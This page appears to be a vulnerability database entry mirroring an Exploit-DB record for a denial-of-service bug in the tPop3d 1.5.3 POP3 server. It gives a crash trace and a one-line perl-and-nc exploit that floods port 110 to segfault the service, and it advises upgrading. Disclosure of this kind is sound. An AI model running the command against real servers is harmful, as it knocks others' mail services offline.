tPop3d 1.5.3 DoS

vendor:

tPop3d

by:

OrderZero

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: tPop3d

Affected Version From: 1.5.3

Affected Version To: 1.5.3

Patch Exists: Yes

Related CWE: N/A

CPE: tpop3d

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2010

tPop3d 1.5.3 is vulnerable to a Denial of Service attack. An attacker can send a large number of 'a' characters to the target port 110 to cause a segmentation fault and crash the service.

Mitigation:

Upgrade to the latest version of tPop3d

Source

Exploit-DB raw data:

# Exploit Title: tPop3d 1.5.3 DoS
# Date: 3/26/10
# Author: OrderZero
# Software Link: http://www.ex-parrot.com/~chris/tpop3d/
# Download: http://www.ex-parrot.com/~chris/tpop3d/tpop3d-1.5.3.tar.gz
# Version: 1.5.3
# Debug:
Starting program: /usr/local/sbin/tpop3d -d
listener_new: gethostbyaddr(0.0.0.0): cannot resolve name
listener_new: 0.0.0.0:110<http://0.0.0.0:110>: cannot obtain domain suffix for this address
listener_new: 0.0.0.0:110<http://0.0.0.0:110>: using fallback domain suffix `bt'
parse_listeners: listening on address 0.0.0.0:110<http://0.0.0.0:110>
1 authentication drivers successfully loaded
net_loop: tpop3d version 1.5.3 successfully started
listeners_post_select: client [7]192.168.1.146/bt<http://192.168.1.146/bt>: connected to local address 192.168.1.139:110<http://192.168.1.139:110>
Program received signal SIGSEGV, Segmentation fault.
0x0804b969 in buffer_consume_to_mark (B=0x8ef4ef0, mark=0x80572af "\n",
mlen=1, str=0x0, slen=0x805a440) at buffer.c:153
153 for (k = (int)mlen - 1; k < (int)a; k += skip[(unsigned char)mark[k]]) {


#exploit:
perl -e 'printf "a"x999999' | nc target 110